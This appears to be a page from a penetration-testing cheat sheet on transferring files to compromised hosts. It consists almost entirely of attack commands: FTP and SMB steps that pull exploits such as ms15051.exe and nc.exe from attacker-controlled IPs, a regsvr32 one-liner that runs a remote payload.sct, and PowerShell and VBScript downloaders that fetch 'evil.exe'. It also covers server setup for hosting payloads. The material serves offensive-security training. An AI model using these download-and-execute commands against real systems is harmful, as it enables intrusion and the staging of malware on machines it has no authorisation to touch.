File Transfers

Python webserver host

python3 -m http.server 80

python -m SimpleHTTPServer 80

Python ftp host

python -m pyftpdlib -p 21

FTP non-interactive

echo open 10.11.14.32 21> ftp.txt echo anonymous>> ftp.txt echo password>> ftp.txt echo binary>> ftp.txt echo GET ms15051.exe>> ftp.txt echo bye>> ftp.txt ftp -v -n -s:ftp.txt

SMB Server (Impacket) 

# mount current directory `.` to smb share name `a`
smbserver.py a .

# to copy eg. in windows
copy \\192.168.1.100\a\wce32.exe .

# execute exe using smb share
\\192.168.1.100\a\whoami.exe

Python file transfer

c:\python26\python.exe -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.69/nc.exe', 'C:\Inetpub\wwwroot\nc.exe')"

Windows Server 1-liner

regsvr32 /u /n /s /i:http://192.168.1.10:443/payload.sct scrobj.dll

Powershell wget script

echo $storageDir = $pwd > wget.ps1 
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://10.11.0.5/evil.exe" >>wget.ps1 
echo $file = "new-exploit.exe" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1

VB downloader script

#Windows downloader script using VB
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# To Download using script
cscript wget.vbs http://10.11.0.5/37.exe evil.exe

Apache Webserver

# Edit port used 'Listen <Port>'
vim /etc/apache2/ports.conf

# Create folder to share
mkdir /var/www/html/share

#chmod
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share

#move file to webserver root
mv /root/Desktop/evil.exe /var/www/html/share

#start 
service apache2 start

TFTP/PureFTP

#Apache Webserver 
#(to edit listen port) 
vim /etc/apache2/ports.conf
Listen 8090

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
mv /root/Desktop/Test.exe /var/www/html/share
service apache2 start



#PURE FTP
#Setting up pure ftpd
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/

#changing ftpd password
/etc/init.d/pure-ftpd restart
pure-pw passwd offsec -f /etc/pure-ftpd/pureftpd.passwd
pure-pw mkdb
/etc/init.d/pure-ftpd restart
PreviousSSRFNextBuffer Overflow

Last updated